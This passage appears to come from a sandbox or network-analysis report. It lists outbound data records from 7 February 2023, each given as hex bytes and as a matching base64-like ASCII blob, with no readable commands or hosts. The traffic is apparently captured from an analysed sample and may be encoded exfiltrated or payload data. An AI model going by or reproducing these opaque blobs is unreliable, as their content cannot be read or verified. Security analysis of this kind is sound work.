                                                                                                                                                                                                              Data Ascii: DUruQfnqJcsXaEihb9oxFOhBE9u5+HWIh35osmu9ukiSHAUDGbCLF8JSX4kFTEOXzXSSzdjVJ8/MIcrG83IoeXSJ81aNDWRCtK3+G9CJLmhsHyKnFxmrdFWYwwf/zmWFKMQkqQ7IasApQG29BHhdLOFpCKmLg9cGunJDWIB5nUVSdK6QmQB7QW1T3UhQl9qCbd97fI1pY8IzIILbKa8utwuzGqAyI1kXvYxo+MvxuHEA7J/hjs/OdmHG8KqG7wV
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9737OUTData Raw: 48 64 59 51 54 77 62 4b 30 54 78 54 36 49 6c 41 45 41 33 47 63 68 45 6d 35 64 6a 6f 4e 6a 43 66 32 76 57 63 71 49 52 56 6e 41 67 6f 44 6e 48 2f 35 61 59 66 4a 4d 75 42 46 61 34 73 56 48 36 78 68 5a 4f 4a 6e 4e 79 4e 51 50 61 2b 54 44 38 66 4e 70 66 75 4d 36 6b 44 44 64 55 54 4f 50 67 31 6e 34 5a 4b 6f 67 51 62 32 69 64 59 61 4d 50 45 68 30 6b 56 48 59 50 70 4e 47 65 6f 4f 74 41 38 71 63 65 56 38 41 76 30 5a 61 48 4f 65 77 30 63 56 42 56 53 78 31 74 62 41 71 66 74 2b 6c 78 72 6e 44 73 5a 4b 58 47 2b 43 71 4e 44 73 57 43 6e 45 2f 42 73 58 6b 49 30 79 74 79 6d 6d 4a 38 49 43 38 51 50 6c 55 38 55 35 2f 56 31 37 66 70 52 4a 44 72 33 38 35 38 44 32 6d 31 37 65 75 66 46 62 47 56 62 76 52 69 4a 30 49 72 6b 70 49 42 6a 49 30 51 75 47 4a 6c 42 37 6b 4f 4b 51 72 6b
                                                                                                                                                                                                              Data Ascii: HdYQTwbK0TxT6IlAEA3GchEm5djoNjCf2vWcqIRVnAgoDnH/5aYfJMuBFa4sVH6xhZOJnNyNQPa+TD8fNpfuM6kDDdUTOPg1n4ZKogQb2idYaMPEh0kVHYPpNGeoOtA8qceV8Av0ZaHOew0cVBVSx1tbAqft+lxrnDsZKXG+CqNDsWCnE/BsXkI0ytymmJ8IC8QPlU8U5/V17fpRJDr3858D2m17eufFbGVbvRiJ0IrkpIBjI0QuGJlB7kOKQrk
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9753OUTData Raw: 52 52 6e 69 53 2f 79 37 6e 73 57 72 35 70 6a 4a 5a 44 44 77 68 33 53 42 65 6a 71 51 39 41 71 61 64 45 50 59 69 47 33 69 56 54 50 31 44 73 46 35 32 2f 52 71 35 32 74 34 37 71 34 54 46 75 32 4d 52 69 38 5a 75 54 66 76 4a 75 44 42 71 31 74 45 79 6f 65 38 2b 48 58 65 4e 5a 4d 46 65 35 69 6b 79 49 69 62 70 67 67 36 62 4f 37 4e 31 7a 72 6e 5a 63 6d 30 56 59 38 4d 72 53 34 5a 73 50 76 75 6e 42 38 4b 6d 44 70 2f 39 53 74 5a 2f 6d 78 50 73 4d 30 4c 47 6a 39 55 58 31 39 77 74 6c 36 7a 70 43 62 47 6a 55 5a 58 32 4e 43 6f 52 70 6c 6b 62 52 34 55 41 47 67 77 69 4e 4e 43 74 79 73 4b 6f 5a 57 77 34 70 66 57 4d 32 30 43 64 66 41 79 76 2f 56 52 4e 41 4f 57 57 44 61 51 2f 73 4f 5a 57 45 5a 79 76 47 77 56 39 69 6b 42 6c 6d 58 71 78 56 58 37 6d 39 51 58 68 7a 69 4e 73 36 35
                                                                                                                                                                                                              Data Ascii: RRniS/y7nsWr5pjJZDDwh3SBejqQ9AqadEPYiG3iVTP1DsF52/Rq52t47q4TFu2MRi8ZuTfvJuDBq1tEyoe8+HXeNZMFe5ikyIibpgg6bO7N1zrnZcm0VY8MrS4ZsPvunB8KmDp/9StZ/mxPsM0LGj9UX19wtl6zpCbGjUZX2NCoRplkbR4UAGgwiNNCtysKoZWw4pfWM20CdfAyv/VRNAOWWDaQ/sOZWEZyvGwV9ikBlmXqxVX7m9QXhziNs65
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9769OUTData Raw: 66 37 4e 31 33 32 63 55 2b 46 49 72 31 36 46 50 4f 54 36 68 4d 61 44 79 4a 34 4a 47 6e 2f 4e 4e 59 34 54 74 37 37 36 65 38 54 48 64 4e 63 66 68 76 39 72 51 6a 2f 57 59 43 6e 6c 54 67 35 2f 64 42 69 50 68 6a 4d 4d 67 4d 41 34 6c 76 30 2b 45 73 4e 2f 71 56 46 74 57 35 53 6d 49 70 62 38 51 41 6f 58 50 5a 39 76 63 6c 32 58 6f 62 74 34 75 59 56 48 37 59 56 4f 38 65 4f 52 54 2b 6c 79 2b 47 46 31 6c 38 58 4d 7a 71 70 32 2f 65 47 72 53 73 4b 61 59 6e 4d 6e 37 66 39 71 4c 31 53 70 6c 30 6a 45 75 33 6b 4b 57 36 55 70 36 4f 4e 58 78 4e 76 38 6d 67 67 6a 2f 69 53 53 5a 49 72 4b 51 64 4e 67 4b 76 4f 74 51 6a 35 69 31 6b 47 55 4c 66 6b 51 39 6f 7a 6d 30 7a 79 6b 78 44 39 44 62 5a 57 77 36 76 47 6a 66 79 55 33 4f 74 72 30 61 2f 37 2b 6f 30 63 4b 70 41 58 45 43 57 6c 59
                                                                                                                                                                                                              Data Ascii: f7N132cU+FIr16FPOT6hMaDyJ4JGn/NNY4Tt776e8THdNcfhv9rQj/WYCnlTg5/dBiPhjMMgMA4lv0+EsN/qVFtW5SmIpb8QAoXPZ9vcl2Xobt4uYVH7YVO8eORT+ly+GF1l8XMzqp2/eGrSsKaYnMn7f9qL1Spl0jEu3kKW6Up6ONXxNv8mggj/iSSZIrKQdNgKvOtQj5i1kGULfkQ9ozm0zykxD9DbZWw6vGjfyU3Otr0a/7+o0cKpAXECWlY
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9785OUTData Raw: 55 45 69 41 4a 57 69 57 62 49 41 4c 47 41 72 56 5a 61 2f 72 61 68 52 38 76 55 35 51 44 78 45 70 56 75 44 73 55 35 62 54 51 45 5a 68 76 63 6a 61 56 71 42 2f 51 74 65 63 4f 36 4c 47 2f 73 39 4d 70 62 74 66 39 45 62 6d 61 72 65 44 5a 31 47 6c 79 50 6f 45 50 7a 4d 64 66 65 52 32 71 55 5a 4a 2f 6f 58 75 58 30 69 44 65 42 4f 77 37 44 73 42 70 67 54 65 6a 2b 71 6d 48 38 46 30 77 38 51 57 59 4d 74 35 51 69 54 77 59 36 42 4c 38 48 57 67 58 58 6d 33 31 35 4c 4b 46 72 61 62 65 75 38 45 43 6f 5a 72 6f 47 79 66 52 48 4a 57 66 66 6e 6d 77 74 55 72 71 76 75 33 70 49 50 2b 38 59 44 4b 75 35 66 4c 44 50 33 65 70 4f 58 56 56 4c 48 65 76 72 45 51 69 32 70 6e 68 48 58 4d 6f 57 7a 32 69 63 78 75 4e 39 4b 2b 51 4c 63 4b 58 56 6d 74 4c 69 43 75 31 62 43 56 38 52 4b 77 34 76 71
                                                                                                                                                                                                              Data Ascii: UEiAJWiWbIALGArVZa/rahR8vU5QDxEpVuDsU5bTQEZhvcjaVqB/QtecO6LG/s9Mpbtf9EbmareDZ1GlyPoEPzMdfeR2qUZJ/oXuX0iDeBOw7DsBpgTej+qmH8F0w8QWYMt5QiTwY6BL8HWgXXm315LKFrabeu8ECoZroGyfRHJWffnmwtUrqvu3pIP+8YDKu5fLDP3epOXVVLHevrEQi2pnhHXMoWz2icxuN9K+QLcKXVmtLiCu1bCV8RKw4vq
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9801OUTData Raw: 67 42 42 30 37 33 69 61 6e 78 75 48 72 38 62 64 4b 72 6d 6c 42 6c 34 30 79 2f 38 51 45 2b 59 74 74 53 67 54 44 37 70 53 7a 78 4c 57 68 75 55 4e 6b 30 35 62 4a 58 72 6c 6e 2b 78 77 36 66 64 68 65 4c 6b 74 58 34 6d 79 59 65 41 75 39 4e 77 4f 77 41 66 55 65 71 55 79 6d 37 51 72 58 67 7a 45 5a 63 43 38 73 5a 68 42 62 30 52 56 70 48 4f 52 52 58 71 61 41 4e 65 45 76 49 6d 31 51 4e 6c 6d 33 6a 38 45 4c 73 43 51 32 49 45 4b 65 57 35 73 65 73 4a 56 36 59 6b 51 47 73 6e 4b 57 78 39 4c 6e 6a 67 37 6c 42 46 31 48 6f 54 41 44 76 75 45 63 56 65 4d 57 57 48 4b 36 79 38 72 76 7a 5a 52 6a 6e 47 61 45 7a 34 62 5a 76 6f 48 79 4c 63 46 50 32 47 49 33 72 79 71 4a 5a 43 52 31 68 46 2f 57 49 4a 2f 62 4b 52 4f 74 6a 30 49 63 77 63 43 66 47 6c 38 70 4f 75 38 2f 7a 4d 38 50 64 4e
                                                                                                                                                                                                              Data Ascii: gBB073ianxuHr8bdKrmlBl40y/8QE+YttSgTD7pSzxLWhuUNk05bJXrln+xw6fdheLktX4myYeAu9NwOwAfUeqUym7QrXgzEZcC8sZhBb0RVpHORRXqaANeEvIm1QNlm3j8ELsCQ2IEKeW5sesJV6YkQGsnKWx9Lnjg7lBF1HoTADvuEcVeMWWHK6y8rvzZRjnGaEz4bZvoHyLcFP2GI3ryqJZCR1hF/WIJ/bKROtj0IcwcCfGl8pOu8/zM8PdN
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9817OUTData Raw: 33 4c 62 33 34 4b 79 78 56 73 43 6e 6a 6b 32 4c 6a 66 36 77 69 79 74 55 35 6b 4e 2f 6d 67 43 76 6f 74 62 33 39 55 69 7a 4c 69 77 4a 68 42 61 41 70 57 79 41 4c 77 41 71 76 57 6e 53 69 35 30 4f 70 6e 64 73 34 34 6f 64 47 44 47 64 32 58 64 64 70 68 4e 79 68 45 49 6c 76 55 57 6a 2b 61 33 45 45 73 33 30 2f 76 4b 37 6d 43 50 6d 7a 38 73 71 49 48 63 4b 39 4d 7a 41 36 68 42 33 48 79 77 79 6d 66 4e 71 75 55 49 49 2f 76 2f 4f 4d 79 6b 77 6e 4e 38 71 76 67 47 38 6c 67 35 59 6f 31 59 77 38 4f 78 66 47 4d 56 79 6b 44 51 7a 4c 4d 76 35 39 61 65 63 5a 54 36 2b 6d 74 55 50 56 73 48 4c 6e 62 34 43 6a 67 35 6e 61 65 64 34 52 76 6d 36 2b 6b 43 68 6d 62 78 59 6b 48 52 4b 72 73 69 48 49 79 6f 71 71 2f 72 6f 4f 5a 2b 30 52 50 65 61 30 6b 30 67 33 53 6c 52 59 73 66 55 52 67 41
                                                                                                                                                                                                              Data Ascii: 3Lb34KyxVsCnjk2Ljf6wiytU5kN/mgCvotb39UizLiwJhBaApWyALwAqvWnSi50Opnds44odGDGd2XddphNyhEIlvUWj+a3EEs30/vK7mCPmz8sqIHcK9MzA6hB3HywymfNquUII/v/OMykwnN8qvgG8lg5Yo1Yw8OxfGMVykDQzLMv59aecZT6+mtUPVsHLnb4Cjg5naed4Rvm6+kChmbxYkHRKrsiHIyoqq/roOZ+0RPea0k0g3SlRYsfURgA
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9833OUTData Raw: 62 34 58 2f 4f 47 69 33 53 45 39 34 4c 44 4b 36 77 71 47 61 4d 61 50 69 73 5a 58 66 63 79 43 47 5a 4a 70 45 32 6d 54 48 69 73 78 33 34 42 54 32 59 4c 61 31 2b 35 6e 51 68 72 6d 7a 57 36 30 66 63 77 31 69 71 30 5a 6b 55 62 75 50 41 4b 6e 4d 78 6f 52 63 67 66 57 6e 53 34 64 43 62 68 31 38 71 35 70 6b 4e 6f 35 55 6b 39 4a 61 4b 54 54 70 51 45 67 2b 5a 59 38 37 31 31 66 34 4b 6f 75 77 53 6f 56 57 6f 59 4b 5a 37 77 56 36 49 68 4a 6c 47 76 6a 6f 31 62 67 68 62 37 39 78 72 65 54 5a 54 69 62 63 43 4e 58 75 70 33 4e 44 38 34 71 31 59 6c 58 59 67 2f 4a 6f 6e 31 5a 67 31 77 39 6c 51 62 7a 74 41 78 5a 4e 64 4c 63 73 61 48 50 2f 6e 32 70 36 77 44 63 6c 64 76 42 2b 59 38 64 39 52 70 49 67 31 32 4f 70 47 51 73 39 2b 48 57 30 55 46 46 66 38 6f 4c 36 70 6f 4a 34 41 72 31
                                                                                                                                                                                                              Data Ascii: b4X/OGi3SE94LDK6wqGaMaPisZXfcyCGZJpE2mTHisx34BT2YLa1+5nQhrmzW60fcw1iq0ZkUbuPAKnMxoRcgfWnS4dCbh18q5pkNo5Uk9JaKTTpQEg+ZY8711f4KouwSoVWoYKZ7wV6IhJlGvjo1bghb79xreTZTibcCNXup3ND84q1YlXYg/Jon1Zg1w9lQbztAxZNdLcsaHP/n2p6wDcldvB+Y8d9RpIg12OpGQs9+HW0UFFf8oL6poJ4Ar1
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9849OUTData Raw: 37 2b 54 72 44 53 74 74 74 72 4b 70 72 7a 77 72 4b 45 5a 63 7a 68 66 49 41 67 55 71 38 47 54 73 39 67 2b 39 73 48 57 38 72 34 69 59 6c 4f 65 77 74 34 57 35 2b 5a 48 37 37 4e 6a 48 34 57 61 68 72 69 30 72 4d 6c 62 66 38 6d 71 42 62 37 55 6b 77 61 75 41 38 6c 4e 35 76 5a 2b 57 36 45 73 63 41 68 6d 70 2f 68 33 74 72 35 66 34 48 6e 35 61 64 73 65 4d 57 45 6f 39 46 6d 43 4a 63 48 42 42 70 76 55 74 74 63 4e 69 75 6d 4b 6a 33 78 2f 6f 67 47 76 4e 77 6c 31 2b 6f 69 65 49 63 4b 64 57 6b 7a 64 69 55 73 7a 6a 38 4a 75 67 74 77 56 4a 2f 5a 4b 6f 49 66 32 72 36 58 49 37 6e 34 52 2b 76 54 70 78 6e 73 39 53 63 6f 4b 56 79 2b 51 63 37 38 4d 67 77 62 46 5a 77 71 33 6c 41 74 33 4b 43 6e 34 70 48 6c 41 48 47 33 45 70 61 42 45 57 7a 4b 4b 76 7a 5a 46 34 30 39 64 4a 74 57 51
                                                                                                                                                                                                              Data Ascii: 7+TrDStttrKprzwrKEZczhfIAgUq8GTs9g+9sHW8r4iYlOewt4W5+ZH77NjH4Wahri0rMlbf8mqBb7UkwauA8lN5vZ+W6EscAhmp/h3tr5f4Hn5adseMWEo9FmCJcHBBpvUttcNiumKj3x/ogGvNwl1+oieIcKdWkzdiUszj8JugtwVJ/ZKoIf2r6XI7n4R+vTpxns9ScoKVy+Qc78MgwbFZwq3lAt3KCn4pHlAHG3EpaBEWzKKvzZF409dJtWQ
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9865OUTData Raw: 5a 64 68 59 2f 58 72 37 6a 78 4b 51 79 6c 38 64 75 56 6e 54 51 71 44 4d 5a 46 59 74 72 68 69 6a 6b 71 6c 4a 31 79 66 75 42 6d 4e 43 63 5a 2b 7a 49 2b 59 46 33 34 43 35 79 56 51 61 4e 72 4e 42 49 4b 70 64 4c 70 74 56 6e 36 30 58 69 58 6d 6b 65 43 6b 73 41 6c 52 49 6c 4a 4e 6a 73 62 32 32 6f 4e 6b 6a 77 78 46 36 2b 41 45 77 45 43 4d 64 7a 2f 45 78 4c 53 55 73 58 62 46 4e 32 76 4a 7a 42 72 78 42 65 30 62 64 69 30 44 6f 35 65 77 73 42 6f 51 37 42 46 61 33 43 59 31 32 48 35 34 4d 44 6b 49 30 6c 4a 41 47 2b 58 73 79 45 79 47 33 69 75 34 31 4c 65 61 49 38 36 75 6a 42 38 75 62 38 6f 6c 49 66 67 4a 65 67 46 65 7a 74 52 4c 44 59 2b 77 69 6c 42 46 50 42 6b 4c 71 62 65 68 64 59 4a 62 77 2b 50 33 64 70 78 2f 76 30 4f 77 66 41 41 6d 38 6e 37 74 6e 54 34 63 79 6d 6a 69
                                                                                                                                                                                                              Data Ascii: ZdhY/Xr7jxKQyl8duVnTQqDMZFYtrhijkqlJ1yfuBmNCcZ+zI+YF34C5yVQaNrNBIKpdLptVn60XiXmkeCksAlRIlJNjsb22oNkjwxF6+AEwECMdz/ExLSUsXbFN2vJzBrxBe0bdi0Do5ewsBoQ7BFa3CY12H54MDkI0lJAG+XsyEyG3iu41LeaI86ujB8ub8olIfgJegFeztRLDY+wilBFPBkLqbehdYJbw+P3dpx/v0OwfAAm8n7tnT4cymji
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9881OUTData Raw: 4f 6d 44 55 71 70 4f 48 35 6b 39 55 31 50 33 51 49 2b 36 38 59 58 70 4d 46 59 68 58 70 51 49 4d 6b 6b 64 75 58 7a 68 32 68 6d 53 59 65 45 52 6e 41 42 70 50 64 67 69 4f 79 71 44 31 59 6f 6e 33 36 6b 71 70 2f 58 6e 4a 77 74 4f 2f 67 5a 35 71 2f 55 64 4f 6f 54 43 38 6a 36 30 55 58 51 61 43 64 52 76 62 55 76 69 4d 41 46 71 66 37 70 54 4b 38 53 4d 2b 44 50 37 38 39 31 4d 30 5a 32 46 54 52 31 4b 52 42 77 39 76 77 63 56 53 69 68 48 5a 32 79 63 57 73 61 72 31 34 30 4f 66 53 2f 75 57 74 57 38 66 57 46 6e 66 42 52 6a 30 46 79 69 42 31 38 53 56 4d 4a 58 49 6a 79 6c 61 46 74 61 6a 64 71 33 67 4f 48 4f 54 63 31 2f 2b 47 6f 53 46 76 39 46 65 44 35 58 56 58 2b 39 52 47 32 48 33 32 61 6e 4c 6e 75 30 7a 69 5a 66 41 38 75 53 4c 52 4c 6a 4e 35 71 72 2b 42 33 58 33 78 4b 4c
                                                                                                                                                                                                              Data Ascii: OmDUqpOH5k9U1P3QI+68YXpMFYhXpQIMkkduXzh2hmSYeERnABpPdgiOyqD1Yon36kqp/XnJwtO/gZ5q/UdOoTC8j60UXQaCdRvbUviMAFqf7pTK8SM+DP7891M0Z2FTR1KRBw9vwcVSihHZ2ycWsar140OfS/uWtW8fWFnfBRj0FyiB18SVMJXIjylaFtajdq3gOHOTc1/+GoSFv9FeD5XVX+9RG2H32anLnu0ziZfA8uSLRLjN5qr+B3X3xKL
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9897OUTData Raw: 63 54 33 64 4b 6a 6a 41 53 68 6f 69 6a 47 74 59 47 67 41 64 2b 48 62 70 71 4b 36 46 31 38 58 38 35 33 57 4f 57 39 59 35 2f 65 61 2b 76 77 31 64 54 76 4d 6b 75 4a 4e 35 67 67 46 51 37 2f 72 34 74 52 54 49 75 74 54 6e 75 54 4e 6c 52 4e 72 65 6f 64 66 43 33 48 71 47 6d 68 41 32 6e 73 74 71 50 4f 4c 61 74 6d 4e 39 69 4a 5a 61 50 52 6e 57 31 75 6f 6a 5a 58 32 65 4a 67 56 59 48 39 44 4b 6a 46 57 41 30 59 71 2b 6d 77 64 4c 4a 71 44 62 76 6b 51 7a 76 68 74 4a 4c 5a 43 63 4d 67 38 2f 53 64 49 68 58 76 35 79 48 44 45 41 57 52 4d 74 48 76 4b 62 62 50 33 6c 4e 37 6a 4a 70 72 32 7a 4b 78 33 6c 70 58 48 36 37 49 5a 47 6b 39 75 50 34 6f 4f 62 5a 34 37 39 65 4a 53 65 58 43 66 6b 64 33 6b 73 69 73 62 45 6e 65 2b 4c 7a 72 6d 37 37 31 72 31 6f 37 72 41 44 47 68 50 63 31 4e
                                                                                                                                                                                                              Data Ascii: cT3dKjjAShoijGtYGgAd+HbpqK6F18X853WOW9Y5/ea+vw1dTvMkuJN5ggFQ7/r4tRTIutTnuTNlRNreodfC3HqGmhA2nstqPOLatmN9iJZaPRnW1uojZX2eJgVYH9DKjFWA0Yq+mwdLJqDbvkQzvhtJLZCcMg8/SdIhXv5yHDEAWRMtHvKbbP3lN7jJpr2zKx3lpXH67IZGk9uP4oObZ479eJSeXCfkd3ksisbEne+Lzrm771r1o7rADGhPc1N
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9913OUTData Raw: 62 32 76 76 39 43 49 4c 49 31 6b 55 55 47 61 72 45 57 4a 69 67 6f 46 36 61 4c 79 6e 4a 36 58 4c 72 4a 47 6b 62 46 39 6f 56 75 7a 4e 4d 35 45 76 6b 37 67 6b 54 46 6a 6e 66 6a 4e 7a 4e 6f 67 37 6b 31 42 74 42 44 57 4b 50 56 2b 62 6a 31 53 42 50 4d 30 35 38 61 2b 73 43 69 2f 33 50 43 4b 4c 66 71 48 36 77 41 78 35 6c 69 72 2f 50 53 43 35 6d 2b 35 78 71 32 6b 78 4c 4b 74 7a 62 41 6c 4c 55 4c 73 6f 71 63 6a 63 59 79 47 4a 76 4b 45 64 36 33 70 47 31 5a 50 49 58 72 2b 63 4c 64 43 5a 4a 4a 59 32 54 4b 4f 7a 35 56 4b 59 7a 74 63 6e 35 6e 33 6c 5a 4a 45 68 78 63 6a 75 45 49 59 2f 31 65 77 64 7a 37 62 79 76 65 6e 32 52 6f 30 2b 67 54 6f 6b 76 4f 37 76 76 4d 70 75 79 43 49 45 55 48 32 76 62 47 2f 6a 33 70 6a 71 4f 72 72 31 4a 59 62 34 75 44 72 44 50 37 62 71 4a 4c 72
                                                                                                                                                                                                              Data Ascii: b2vv9CILI1kUUGarEWJigoF6aLynJ6XLrJGkbF9oVuzNM5Evk7gkTFjnfjNzNog7k1BtBDWKPV+bj1SBPM058a+sCi/3PCKLfqH6wAx5lir/PSC5m+5xq2kxLKtzbAlLULsoqcjcYyGJvKEd63pG1ZPIXr+cLdCZJJY2TKOz5VKYztcn5n3lZJEhxcjuEIY/1ewdz7byven2Ro0+gTokvO7vvMpuyCIEUH2vbG/j3pjqOrr1JYb4uDrDP7bqJLr
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9929OUTData Raw: 54 37 5a 62 66 4f 72 63 79 45 65 75 4e 48 4c 4c 47 6d 63 45 74 33 74 4e 33 65 63 6f 66 58 31 55 34 4e 2b 39 43 64 2f 45 30 44 44 6c 43 33 5a 71 76 6d 50 66 36 5a 4f 31 77 50 6c 5a 68 58 55 69 6e 61 57 78 5a 6e 4f 4b 34 62 48 4b 2b 56 72 5a 53 56 76 31 76 74 44 35 4e 5a 59 70 76 2b 41 4d 31 69 76 74 4f 48 77 43 6f 78 5a 6b 77 6f 52 6b 42 57 6f 73 65 6e 39 44 61 55 50 2f 38 6f 50 48 77 31 78 6e 52 58 6d 4a 56 34 79 74 55 41 6c 2f 78 46 50 46 50 31 72 42 32 65 71 59 44 54 43 64 38 37 67 44 39 68 36 37 49 48 4a 67 32 43 66 6e 48 70 6f 44 39 58 46 6d 4d 50 68 64 6e 65 70 73 53 67 47 75 34 76 48 68 72 55 56 4d 49 76 4d 57 33 75 52 58 71 73 34 4a 6b 69 62 6e 34 36 58 58 71 53 39 52 71 4c 52 30 6d 51 73 7a 4f 58 42 71 34 43 53 79 65 37 68 6c 32 34 6f 54 30 7a 45
                                                                                                                                                                                                              Data Ascii: T7ZbfOrcyEeuNHLLGmcEt3tN3ecofX1U4N+9Cd/E0DDlC3ZqvmPf6ZO1wPlZhXUinaWxZnOK4bHK+VrZSVv1vtD5NZYpv+AM1ivtOHwCoxZkwoRkBWosen9DaUP/8oPHw1xnRXmJV4ytUAl/xFPFP1rB2eqYDTCd87gD9h67IHJg2CfnHpoD9XFmMPhdnepsSgGu4vHhrUVMIvMW3uRXqs4Jkibn46XXqS9RqLR0mQszOXBq4CSye7hl24oT0zE
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9945OUTData Raw: 6d 63 32 42 46 54 74 4c 61 67 53 75 74 57 2b 4a 65 78 53 4f 73 4d 4f 72 5a 58 58 52 38 54 45 4f 6b 54 43 39 6a 57 43 70 68 35 6c 55 61 72 4e 4c 5a 4d 2f 70 62 32 52 59 62 56 7a 5a 4a 38 51 51 76 4e 47 75 72 47 4c 6b 58 4b 5a 53 57 2b 6d 58 7a 70 65 68 62 44 55 70 74 2b 64 62 50 51 5a 42 57 4c 34 79 4f 4d 42 39 30 74 58 42 65 69 47 2f 4e 46 41 70 67 79 6a 39 48 38 6f 6c 36 51 47 43 5a 37 39 63 51 5a 4f 31 36 43 59 72 69 53 32 32 63 56 79 41 4c 4d 66 30 56 73 49 6b 30 4f 43 38 6d 78 74 73 43 71 76 38 56 73 77 6e 71 42 38 78 6e 66 51 66 70 30 7a 6b 51 78 78 6f 56 63 36 4e 76 32 66 39 58 36 70 5a 71 77 69 30 72 51 4f 6a 43 68 57 76 64 46 73 39 71 6c 4f 71 45 55 35 4f 47 57 54 37 6b 42 4e 64 4d 49 38 54 6b 4e 74 69 34 70 75 30 6a 69 64 69 4d 51 57 76 65 34 57
                                                                                                                                                                                                              Data Ascii: mc2BFTtLagSutW+JexSOsMOrZXXR8TEOkTC9jWCph5lUarNLZM/pb2RYbVzZJ8QQvNGurGLkXKZSW+mXzpehbDUpt+dbPQZBWL4yOMB90tXBeiG/NFApgyj9H8ol6QGCZ79cQZO16CYriS22cVyALMf0VsIk0OC8mxtsCqv8VswnqB8xnfQfp0zkQxxoVc6Nv2f9X6pZqwi0rQOjChWvdFs9qlOqEU5OGWT7kBNdMI8TkNti4pu0jidiMQWve4W
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9961OUTData Raw: 2b 52 62 4a 57 35 48 56 33 33 73 6d 4f 79 42 53 41 73 32 6a 4b 63 36 75 36 61 65 62 6b 6f 39 32 63 70 6d 6f 48 2f 71 50 61 34 33 5a 79 68 79 55 63 39 69 76 43 6d 70 46 38 58 6a 6d 43 59 6e 57 71 74 35 67 44 4d 48 50 30 41 4b 69 33 69 66 42 71 4a 74 33 45 59 4d 75 6f 76 4c 64 6c 34 46 30 71 30 63 51 76 38 43 50 63 35 63 6b 6d 6b 4c 6b 41 4f 52 39 56 74 7a 52 61 42 70 67 6f 58 77 7a 4e 4b 62 42 6f 38 37 2f 6c 39 62 6e 62 49 74 69 47 4c 61 6b 75 74 68 53 71 4b 41 57 49 62 33 67 41 79 65 48 69 30 65 73 55 34 78 55 74 46 4b 35 41 47 67 6c 66 75 44 5a 6b 2b 6f 54 64 63 38 6e 77 49 50 77 4d 69 69 47 47 77 73 37 65 64 42 51 76 43 61 41 64 71 52 35 71 4d 41 64 6f 76 71 5a 39 6b 6e 30 62 6b 72 54 4c 36 73 71 41 2b 33 43 6a 62 6b 71 49 69 51 68 37 79 6a 39 4e 45 75
                                                                                                                                                                                                              Data Ascii: +RbJW5HV33smOyBSAs2jKc6u6aebko92cpmoH/qPa43ZyhyUc9ivCmpF8XjmCYnWqt5gDMHP0AKi3ifBqJt3EYMuovLdl4F0q0cQv8CPc5ckmkLkAOR9VtzRaBpgoXwzNKbBo87/l9bnbItiGLakuthSqKAWIb3gAyeHi0esU4xUtFK5AGglfuDZk+oTdc8nwIPwMiiGGws7edBQvCaAdqR5qMAdovqZ9kn0bkrTL6sqA+3CjbkqIiQh7yj9NEu
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9977OUTData Raw: 2b 6d 36 77 45 48 51 44 49 42 4e 39 38 71 34 54 48 2f 76 2f 63 4e 4d 48 78 52 67 33 64 58 32 79 31 57 6d 71 50 55 67 63 77 6b 71 31 59 35 4c 4d 78 6e 62 48 5a 63 6b 61 67 36 45 5a 55 6c 55 74 76 2f 68 65 56 35 56 4e 62 45 51 72 59 67 75 68 71 38 53 57 70 43 33 49 65 69 59 53 44 54 56 6b 63 76 4d 74 68 41 4d 43 31 66 53 6f 65 41 77 58 4a 47 41 4c 79 6e 34 77 78 5a 48 72 4d 4f 30 45 64 47 6c 59 2b 57 64 41 68 73 36 63 62 54 46 38 66 64 43 56 35 4c 42 34 75 61 34 4e 6c 70 73 62 6c 71 76 62 66 7a 42 59 61 39 53 51 38 79 4f 47 31 47 6d 34 31 53 4f 69 64 2b 47 32 44 57 78 57 6c 31 44 44 61 44 51 44 42 36 46 74 76 5a 67 75 47 44 53 33 6e 37 34 37 74 49 53 61 77 4e 4a 32 30 30 61 41 4e 69 73 6f 74 5a 59 57 76 38 63 6e 78 63 56 6f 56 51 41 4b 68 79 42 6a 76 30 45
                                                                                                                                                                                                              Data Ascii: +m6wEHQDIBN98q4TH/v/cNMHxRg3dX2y1WmqPUgcwkq1Y5LMxnbHZckag6EZUlUtv/heV5VNbEQrYguhq8SWpC3IeiYSDTVkcvMthAMC1fSoeAwXJGALyn4wxZHrMO0EdGlY+WdAhs6cbTF8fdCV5LB4ua4NlpsblqvbfzBYa9SQ8yOG1Gm41SOid+G2DWxWl1DDaDQDB6FtvZguGDS3n747tISawNJ200aANisotZYWv8cnxcVoVQAKhyBjv0E
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC9993OUTData Raw: 75 58 61 5a 57 76 4a 72 79 34 64 68 78 63 43 57 46 51 33 52 53 34 77 65 6d 77 34 56 76 68 6d 4a 51 71 55 79 2f 43 34 56 78 72 35 50 32 73 77 46 75 35 77 37 31 44 72 4d 55 52 66 4b 73 73 6d 55 32 4d 67 77 36 70 33 52 7a 47 30 5a 4e 4c 33 79 38 72 38 45 4d 36 57 4c 2f 4e 35 5a 34 44 78 50 41 48 6a 36 31 55 51 4b 69 47 6f 66 34 32 4a 53 65 4a 68 58 44 7a 7a 77 36 63 70 30 55 47 78 36 6a 63 31 77 4a 49 4e 66 4b 6b 6c 56 6f 49 55 38 68 75 47 39 32 31 52 6c 4a 4c 43 6d 6e 65 2b 4f 6c 41 34 6b 53 31 62 77 33 44 30 79 73 46 35 58 65 70 58 6d 4a 79 30 70 51 6d 49 54 49 4c 51 45 67 48 6d 38 45 4c 59 67 6c 50 5a 66 4c 77 76 70 6c 76 46 50 34 52 68 61 31 32 6a 77 5a 63 35 73 5a 51 4d 53 74 76 6c 52 33 71 65 59 2b 49 71 34 39 65 48 69 70 77 76 57 48 62 56 4a 46 7a 75
